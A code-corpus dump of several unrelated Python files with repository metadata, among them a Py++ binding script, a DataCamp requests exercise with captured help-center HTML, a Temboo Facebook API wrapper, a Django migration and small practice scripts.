print('Spam!')
if __name__ == '__main__':
import logging
logging.basicConfig(level=logging.DEBUG)
print(add(2, 3))
# Change the log message
add.logmsg = 'Add called'
print(add(2, 3))
# Change the log level
add.level = logging.WARNING
print(add(2, 3))
| [
"[email protected]"
] | |
dbd5cecff92cba1fcf35215102752961f33b4718 | ce74ed4ad6834168b81d6ec5e53c80935f247fe1 | /python-wrapper/normalizer.py | 260c4e083f822c223ff64a447d4b415a33455417 | [] | no_license | chenghuige/melt | 6b6984243c71a85ec343cfaa67a66e3d1b48c180 | d2646ffe84eabab464b4bef6b31d218abdbf6ce5 | refs/heads/master | 2021-01-25T16:46:57.567890 | 2017-08-26T04:30:13 | 2017-08-26T04:30:13 | 101,304,210 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,386 | py | import os
import sys
import glob
from pyplusplus import module_builder
root = '/home/users/chenghuige/rsc/'
name = 'normalizer'
#define_symbols = ['GCCXML','PYTHON_WRAPPER','NO_BAIDU_DEP']
define_symbols = ['GCCXML','PYTHON_WRAPPER']
files = [
'./gezi.include.python/common_util.h',
'./gezi.include.python/log_util.h',
'./include.python/Prediction/Normalization/Normalizer.h',
'./include.python/Prediction/Normalization/NormalizerFactory.h',
'./gezi.include.python/Numeric/Vector/Vector.h',
]
paths = [
#'./gezi.include.python/Numeric/Vector/',
#'./include.python/MLCore/',
#'./include.python/Prediction/Instances/',
]
#import gezi
#for path in paths:
# files += [f for f in gezi.get_filepaths(path) if f.endswith('.h')]
include_paths=[
'third-64/glog',
'third-64/gflags',
'third-64/gtest',
'third-64/boost.1.53',
'lib2-64/bsl',
'lib2-64/postag',
'lib2-64/dict',
'lib2-64/libcrf',
'lib2-64/others-ex',
'lib2-64/ullib',
'lib2-64/ccode',
'public/odict/output',
'public/uconv/output',
'public/configure/output',
'app/search/sep/anti-spam/gezi/third/rabit',
]
include_paths_python = [
'app/search/sep/anti-spam/melt/python-wrapper',
]
include_paths_obsolute = [
'app/search/sep/anti-spam/melt/python-wrapper/gezi.include.python',
'lib2-64/wordseg',
'public/comlog-plugin',
'app/search/sep/anti-spam/gezi/third',
]
mb = module_builder.module_builder_t(
gccxml_path = '~/.jumbo/bin/gccxml',
define_symbols = define_symbols,
files = files,
include_paths = [root + f + '/include' for f in include_paths]
+ [root + f + '/include.python' for f in include_paths_python]
+ [root + f for f in include_paths_obsolute]
)
mb.build_code_creator( module_name='lib%s'%name )
mb.code_creator.user_defined_directories.append( os.path.abspath('.') )
mb.write_module( os.path.join( os.path.abspath('./'), '%s_py.cc'%name) )
| [
"chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97"
] | chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97 |
f81be5ea05f4ea49f85bd863cbbd7e280fde0fa5 | 98e1716c1c3d071b2fedef0ac029eb410f55762c | /part6-import-webdata/No06-Performing-HTTP-requests-in-Python-using-requests.py | e58c16b5e4fa92f0aab1b600c1952cfbd1c58eaa | [] | no_license | iamashu/Data-Camp-exercise-PythonTrack | 564531bcf1dff119949cbb75e1fd63d89cb2779f | c72a4e806494f0e263ced9594597dc8882c2131c | refs/heads/master | 2020-07-22T00:23:12.024386 | 2019-04-12T09:24:42 | 2019-04-12T09:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,423 | py | #Performing HTTP requests in Python using requests
'''
Now that you've got your head and hands around makin
g HTTP requests using the urllib package, you're going to figure out how to do the same using the higher-level requests library. You'll once again be pinging DataCamp servers for their "http://www.datacamp.com/teach/documentation" page.
Note that unlike in the previous exercises using urllib, you don't have to close the connection when using requests!
#Instructions
100 XP
Import the package requests.
Assign the URL of interest to the variable url.
Package the request to the URL, send the request and catch the response with a single function requests.get(), assigning the response to the variable r.
Use the text attribute of the object r to return the HTML of the webpage as a string; store the result in a variable text.
Hit submit to print the HTML of the webpage.
'''
# Code
# Import package
#from urllib.request import Requests Error: not this lib
import requests
# Specify the url: url
url="http://www.datacamp.com/teach/documentation"
# Packages the request, send the request and catch the response: r
r=requests.get(url) #not Requests(url) And don't need to be closed
# Extract the response: text
text=r.text
# Print the html
print(text)
'''result: the format is differeent from the previous one
<!doctype html>
<html lang="en" data-direction="ltr">
<head>
<link href="https://fonts.intercomcdn.com" rel="preconnect" crossorigin>
<script src="https://www.googletagmanager.com/gtag/js?id=UA-39297847-9" async="async" nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0="></script>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-39297847-9');
</script>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>DataCamp Help Center</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="intercom:trackingEvent" content="{"name":"Viewed Help Center","metadata":{"action":"viewed","object":"educate_home","place":"help_center","owner":"educate"}}" />
<link rel="stylesheet" media="all" href="https://intercom.help/_assets/application-d1f7d2f5ecbab279e0c25a70c759326b30d53b9cc5832e8fdc7973fe1bc09ce2.css" />
<link rel="canonical" href="http://instructor-support.datacamp.com/"/>
<link href="https://static.intercomassets.com/assets/educate/educate-favicon-64x64-at-2x-52016a3500a250d0b118c0a04ddd13b1a7364a27759483536dd1940bccdefc20.png" rel="shortcut icon" type="image/png" />
<style>
.header, .avatar__image-extra { background-color: #263e63; }
.article a, .c__primary { color: #263e63; }
.avatar__fallback { background-color: #263e63; }
article a.intercom-h2b-button { background-color: #263e63; border: 0; }
</style>
<meta property="og:title" content="DataCamp Help Center" />
<meta name="twitter:title" content="DataCamp Help Center" />
<meta property="og:type" content="website" />
<meta property="og:image" content="" />
<meta name="twitter:image" content="" />
</head>
<body class="">
<header class="header">
<div class="container header__container o__ltr" dir="ltr">
<div class="content">
<div class="mo o__centered o__reversed header__meta_wrapper">
<div class="mo__body">
<div class="header__logo">
<a href="/">
<img alt="DataCamp Help Center" src="https://downloads.intercomcdn.com/i/o/81221/856b63d438031754b681746b/4ea2737e4266936fb423911d9c587812.png" />
</a>
</div>
</div>
<div class="mo__aside">
<div class="header__home__url">
<a target="_blank" rel='noopener' href="http://www.datacamp.com/teach"><svg width="14" height="14" viewBox="0 0 14 14" xmlns="http://www.w3.org/2000/svg"><title>Group 65</title><g stroke="#FFF" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"><path d="M11.5 6.73v6.77H.5v-11h7.615M4.5 9.5l7-7M13.5 5.5v-5h-5"/></g></svg><span>Go to DataCamp</span></a>
</div>
</div>
</div>
<h1 class="header__headline">Advice and answers from the DataCamp Team</h1>
<form action="/" autocomplete="off" class="header__form search">
<input type="text" autocomplete="off" class="search__input js__search-input o__ltr" placeholder="Search for articles..." tabindex="1" name="q" value="">
<div class="search_icons">
<button type="submit" class="search__submit o__ltr"></button>
<a class="search__clear-text__icon">
<svg class="interface-icon" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16">
<path d="M8.018 6.643L5.375 4 4 5.375l2.643 2.643L4 10.643 5.375 12l2.643-2.625L10.625 12 12 10.643 9.357 8.018 12 5.375 10.643 4z" />
</svg>
</a>
</form>
</div>
</div>
</div>
</header>
<div class="container">
<div class="content educate_content"><section class="section">
<div class="g__space">
<a href="/getting-started" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="chat-star" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linejoin="round"><path d="M20 34.942c-2.083-.12-4.292-.42-6-.942L3 39l4-9c-3.858-3.086-6-7.246-6-12C1 8.61 10.328 1 21.835 1 33.343 1 43 8.61 43 18c0 1.044-.117 2.065-.342 3.057"></path><path d="M36.016 25L40 33h7l-6 5 3 9-8-5.494L28 47l3-9-6-5h7l4.016-8z"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Getting Started</h2>
<p class="paper__preview">Everything you need to know to begin your DataCamp journey!</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2678519/square_128/pic2-1539176502.JPG?1539176502" alt="Jen Bricker avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+2</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
11 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Jen Bricker,</span> <span class='c__darker'> Yashas Roy</span> and 2 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/courses" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="devices-laptop" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round"><path d="M41 31H7V11h34v20z"></path><path d="M3 35V10a3 3 0 0 1 3-3h36a3 3 0 0 1 3 3v25m-16 0v2H19v-2H1v4a2 2 0 0 0 2 2h42a2 2 0 0 0 2-2v-4H29z" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Courses</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp courses.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2247397/square_128/IMG_2763_final_square_small-1532522734.jpg?1532522734" alt="Nick Carchedi avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2366194/square_128/richie-in-hairnet-1537451295.JPG?1537451295" alt="Richie Cotton avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+7</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
78 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Yashas Roy,</span> <span class='c__darker'> Nick Carchedi,</span> <span class='c__darker'> Richie Cotton</span> and 7 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/daily-practice" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="tools-dashboard" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"><path d="M27 31a3 3 0 0 1-6 0 3 3 0 0 1 6 0zm-.88-2.12l9.9-9.9M5 32h4m34 .002L39 32m2.553-8.27l-3.696 1.53M31.27 13.447l-1.53 3.695M24 12v4m-7.27-2.553l1.53 3.695m-7.694.422l2.826 2.83M6.447 23.73l3.695 1.53"></path><path d="M24 8C11.297 8 1 18.3 1 31v9h46v-9C47 18.3 36.703 8 24 8z"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Daily Practice</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp Daily Practice.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2734728/square_128/Anneleen_Beckers-xtra-small-1541624054.jpg?1541624054" alt="Anneleen Beckers avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
12 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Anneleen Beckers</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/projects" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="book-opened2"><path d="M24 11c0-3.866 10.297-7 23-7v33c-12.703 0-23 3.134-23 7 0-3.866-10.3-7-23-7V4c12.7 0 23 3.134 23 7zm0 0v32m-5-27.52c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.23-7.773-2.127-13-2.48m23-15.52c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.23 7.773-2.127 13-2.48" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Projects</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp projects.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2360843/square_128/20170928_DavidV_ByBBImagery-022-1380-1537479799.jpg?1537479799" alt="David Venturi avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
19 articles in this collection
</span>
<br>
Written by <span class='c__darker'> David Venturi</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/course-editor-basics" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="book-bookmark" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round"><path d="M35 31l-6-6-6 6V7h12v24z"></path><path d="M35 9h6v38H11a4 4 0 0 1-4-4V5" stroke-linejoin="round"></path><path d="M39 9V1H11a4 4 0 0 0 0 8h12" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Course Editor Basics</h2>
<p class="paper__preview">Everything you need to know to get going with our online course editor.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2247397/square_128/IMG_2763_final_square_small-1532522734.jpg?1532522734" alt="Nick Carchedi avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
5 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins</span> and <span class='c__darker'> Nick Carchedi</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/tips-and-tricks" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="comms-mail" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linejoin="round"><path d="M47 3L1 22l18 7L47 3z"></path><path d="M47 3l-8 37-20-11L47 3zM19 29v16l7-12"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Tips & Tricks</h2>
<p class="paper__preview">Become a DataCamp wizard!</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
6 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/frequently-asked-questions-faq" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="chat-question" fill="none" fill-rule="evenodd"><path d="M47 21.268c0 10.363-10.297 18.765-23 18.765-2.835 0-5.55-.418-8.058-1.184L2.725 45 7.9 34.668c-4.258-3.406-6.9-8.15-6.9-13.4C1 10.904 11.297 2.502 24 2.502s23 8.402 23 18.766z" stroke-width="2" stroke-linejoin="round"></path><path d="M25 28.502a2 2 0 1 0 0 4 2 2 0 0 0 0-4" fill="#231F1F"></path><path d="M19 17.75c0-3.312 2.686-6.124 6-6.124 3.313 0 6 2.626 6 5.938 0 3.315-2.687 5.938-6 5.938V26" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Frequently Asked Questions (FAQ)</h2>
<p class="paper__preview">Common questions that arise during content creation.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2366194/square_128/richie-in-hairnet-1537451295.JPG?1537451295" alt="Richie Cotton avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+3</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
48 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Richie Cotton,</span> <span class='c__darker'> Yashas Roy</span> and 3 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/miscellaneous" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="tools-edit"><path d="M14.932 43.968L2 47l3.033-12.93 31.2-31.203a4 4 0 0 1 5.658 0l4.247 4.243a4 4 0 0 1 0 5.656L14.932 43.968zm29.84-29.735L34.82 4.28m7.125 12.782L31.992 7.11M15.436 43.465l-9.9-9.9" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Miscellaneous</h2>
<p class="paper__preview">Have a question for DataCamp, but not about creating content? You'll probably find the answer here.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2830289/square_128/IMG_0665_a-1545331304.jpg?1545331304" alt="Lisa Monteleone avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2859053/square_128/gabriel_about_pic-1546620603.jpg?1546620603" alt="Gabriel de Selding avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
9 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Lisa Monteleone,</span> and <span class='c__darker'> Gabriel de Selding</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
</section>
</div>
</div>
<footer class="footer">
<div class="container">
<div class="content">
<div class="u__cf" dir="ltr">
<div class="footer__logo">
<a href="/">
<img alt="DataCamp Help Center" src="https://downloads.intercomcdn.com/i/o/81221/856b63d438031754b681746b/4ea2737e4266936fb423911d9c587812.png" />
</a>
</div>
<div class="footer__advert logo">
<img src="https://intercom.help/_assets/intercom-a6a6ac0f033657af1aebe2e9e15b94a3cd5eabf6ae8b9916df6ea49099a894d8.png" alt="Intercom" />
<a href="https://www.intercom.com/intercom-link?company=DataCamp&solution=customer-support&utm_campaign=intercom-link&utm_content=We+run+on+Intercom&utm_medium=help-center&utm_referrer=http%3A%2F%2Finstructor-support.datacamp.com%2F&utm_source=desktop-web">We run on Intercom</a>
</div>
</div>
</div>
</div>
</footer>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
window.intercomSettings = {"app_id":"ug0ps1rq"};
</script>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
(function(){var w=window;var ic=w.Intercom;if(typeof ic==="function"){ic('reattach_activator');ic('update',intercomSettings);}else{var d=document;var i=function(){i.c(arguments)};i.q=[];i.c=function(args){i.q.push(args)};w.Intercom=i;function l(){var s=d.createElement('script');s.type='text/javascript';s.async=true;s.src="https://widget.intercom.io/widget/ug0ps1rq";var x=d.getElementsByTagName('script')[0];x.parentNode.insertBefore(s,x);}if(w.attachEvent){w.attachEvent('onload',l);}else{w.addEventListener('load',l,false);}}})()
</script>
<script src="https://intercom.help/_assets/application-4500b8159f32efa509d5464e27ebd8e4735c3a0e4b59bd4aab6c00e8e49c04d2.js" nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0="></script>
</body>
</html>
''' | [
"[email protected]"
] | |
071cd8751ab4d3c34048353a7eaa7e15171d75b1 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Facebook/Actions/Fitness/Walks/UpdateWalk.py | 493e93d6dc4ff63b1d782b571214053924414cfc | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,177 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# UpdateWalk
# Updates an existing walk action.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class UpdateWalk(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the UpdateWalk Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Facebook/Actions/Fitness/Walks/UpdateWalk')
def new_input_set(self):
return UpdateWalkInputSet()
def _make_result_set(self, result, path):
return UpdateWalkResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return UpdateWalkChoreographyExecution(session, exec_id, path)
class UpdateWalkInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the UpdateWalk
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved from the final step of the OAuth process.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_ActionID(self, value):
"""
Set the value of the ActionID input for this Choreo. ((required, string) The id of the action to update.)
"""
InputSet._set_input(self, 'ActionID', value)
def set_Course(self, value):
"""
Set the value of the Course input for this Choreo. ((optional, string) The URL or ID for an Open Graph object representing the course.)
"""
InputSet._set_input(self, 'Course', value)
def set_EndTime(self, value):
"""
Set the value of the EndTime input for this Choreo. ((optional, date) The time that the user ended the action (e.g. 2013-06-24T18:53:35+0000).)
"""
InputSet._set_input(self, 'EndTime', value)
def set_ExpiresIn(self, value):
"""
Set the value of the ExpiresIn input for this Choreo. ((optional, integer) The amount of time (in milliseconds) from the publish_time that the action will expire.)
"""
InputSet._set_input(self, 'ExpiresIn', value)
def set_Message(self, value):
"""
Set the value of the Message input for this Choreo. ((optional, string) A message attached to this action. Setting this parameter requires enabling of message capabilities.)
"""
InputSet._set_input(self, 'Message', value)
def set_Place(self, value):
"""
Set the value of the Place input for this Choreo. ((optional, string) The URL or ID for an Open Graph object representing the location associated with this action.)
"""
InputSet._set_input(self, 'Place', value)
def set_Tags(self, value):
"""
Set the value of the Tags input for this Choreo. ((optional, string) A comma separated list of other profile IDs that also performed this action.)
"""
InputSet._set_input(self, 'Tags', value)
class UpdateWalkResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the UpdateWalk Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((boolean) The response from Facebook.)
"""
return self._output.get('Response', None)
class UpdateWalkChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return UpdateWalkResultSet(response, path)
| [
"[email protected]"
] | |
0e5c2f08572df65160cf0040294875735675b65c | ce78a21f86faf0b9783b4cbc1df1fc562e80a2d8 | /Public/problem/D1/2070.큰놈,작은놈,같은놈.py | 94f01b7703da6229722d2d9bd4b809bf0e98293d | [] | no_license | jongjunpark/TIL | 18961c6518f78c8e3d80677f39caf32c727c5beb | 28f4d83e28851aac2dee4e77321543f1c811cc83 | refs/heads/master | 2023-03-17T01:45:51.867005 | 2022-10-31T10:44:05 | 2022-10-31T10:44:05 | 245,943,735 | 1 | 0 | null | 2023-03-05T17:15:39 | 2020-03-09T04:28:06 | Python | UTF-8 | Python | false | false | 260 | py | T = int(input())
for t in range(1,T+1):
numbers = list(map(int,input().split()))
if numbers[0] > numbers[1]:
print("#{} >".format(t))
elif numbers[0] == numbers[1]:
print("#{} =".format(t))
else:
print("#{} <".format(t)) | [
"[email protected]"
] | |
bfd1700ad0198fea64886e0f2aa06687748976c6 | 4979df3343d7b99a9a826bd1cb946ae79fac260c | /tests/test_runner.py | 1ecd57ab36aa321d2148d96008b681ff168fcb63 | [
"BSD-3-Clause"
] | permissive | e-calder/enaml | 753ff329fb8a2192bddbe7166581ed530fb270be | 8f02a3c1a80c0a6930508551c7de1d345095173d | refs/heads/master | 2021-07-30T01:18:29.222672 | 2021-07-27T08:51:50 | 2021-07-27T08:51:50 | 206,089,494 | 0 | 0 | NOASSERTION | 2019-09-03T13:52:44 | 2019-09-03T13:52:44 | null | UTF-8 | Python | false | false | 673 | py | import os
import sys
import pytest
from utils import enaml_run
from enaml.application import Application, deferred_call
from enaml.runner import main
@pytest.fixture
def sys_argv():
""" Fixture that saves sys.argv and restores it after the test completes
"""
argv = sys.argv
try:
yield
finally:
sys.argv = argv
def test_runner(enaml_run, sys_argv):
"""Test invoking the runner application.
"""
dir_path = os.path.abspath(os.path.split(os.path.dirname(__file__))[0])
sys.argv = ['enaml-run',
os.path.join(dir_path,
'examples', 'stdlib', 'mapped_view.enaml')]
main()
| [
"[email protected]"
] | |
2df3f8b7738ac707606738926f6e0f3cb24f0154 | 4fc1d1097ac124d0dcbb9c1e574efec5c38105d8 | /staff/migrations/0001_initial.py | 90b968534d808291b151eba7b45cc526e3b91f5a | [] | no_license | lilianwaweru/management | 077d3261e1f8bd5d6c84a0b40edd28249410279f | e71bd0b67266ca8715605574e52c81137a66eaeb | refs/heads/master | 2020-12-23T14:09:49.630171 | 2020-03-02T12:34:06 | 2020-03-02T12:34:06 | 237,173,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,659 | py | # Generated by Django 3.0.3 on 2020-03-02 11:14
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Work',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, upload_to='images/')),
('first_name', models.CharField(max_length=30)),
('other_names', models.CharField(max_length=30)),
('department', models.CharField(max_length=30)),
('employee_number', models.IntegerField()),
('identification_number', models.IntegerField()),
('nssf_number', models.IntegerField()),
('nhif_number', models.IntegerField()),
('date_of_birth', models.DateField()),
('employee_position', models.CharField(max_length=30)),
('secondary_shool', models.CharField(max_length=100)),
('higher_education', models.CharField(max_length=100)),
('level_of_education', models.CharField(max_length=100)),
('course', models.CharField(max_length=100)),
('other_certificates', models.CharField(max_length=100)),
('company', models.CharField(max_length=100)),
('position', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('tasks', models.CharField(max_length=1000)),
],
),
]
| [
"[email protected]"
] | |
e328cc4ddbb881174b91f93521be7d3e5d87ce0a | 15b7a9708d6fb6f9ae5ac55830f996c629468910 | /ch06/Ex6_16.py | 686602d686c015c0a9a4d929a1940e73303da2f7 | [] | no_license | Anancha/Python_Bible | 81dfab4ebe7f74c46615403cbd8a37b714b84df1 | d9569abf2ad60393289fcec22b81340a19e28601 | refs/heads/main | 2023-09-03T00:52:58.249183 | 2021-11-12T07:57:56 | 2021-11-12T07:57:56 | 415,224,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | shape_tuple1 = ("square","circle","triangle","rectangle","star")
shape_tuple2 = ("heart","oval")
print("shape_tuple1 = ",shape_tuple1)
print("shape_tuple2 = ",shape_tuple2)
length = len(shape_tuple1)
print("shape_tuple1 = ",length)
print("shape_tuple1[0] = ",shape_tuple1[0])
print("shape_tuple1[4] = ",shape_tuple1[4])
print("shape_tuple1[-5] = ",shape_tuple1[-5])
print("shape_tuple1[-1] = ",shape_tuple1[-1])
print("shape_tuple1[0:5] = ",shape_tuple1[0:5])
print("shape_tuple1[:5] = ",shape_tuple1[:5])
print("shape_tuple1[-4:] = ",shape_tuple1[-4:])
shape_tuple = shape_tuple1 + shape_tuple2
print("combine tuple1 and tuple2 = ",shape_tuple) | [
"[email protected]"
] | |
9207964a8abeafead8e2e062e1c63f4719aa680e | d7016f69993570a1c55974582cda899ff70907ec | /tools/azure-sdk-tools/devtools_testutils/proxy_testcase.py | 0c0fe3dc403f3642e5552ec84ae5ffe10acbc867 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 10,296 | py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import logging
import six
import os
from typing import TYPE_CHECKING
import urllib.parse as url_parse
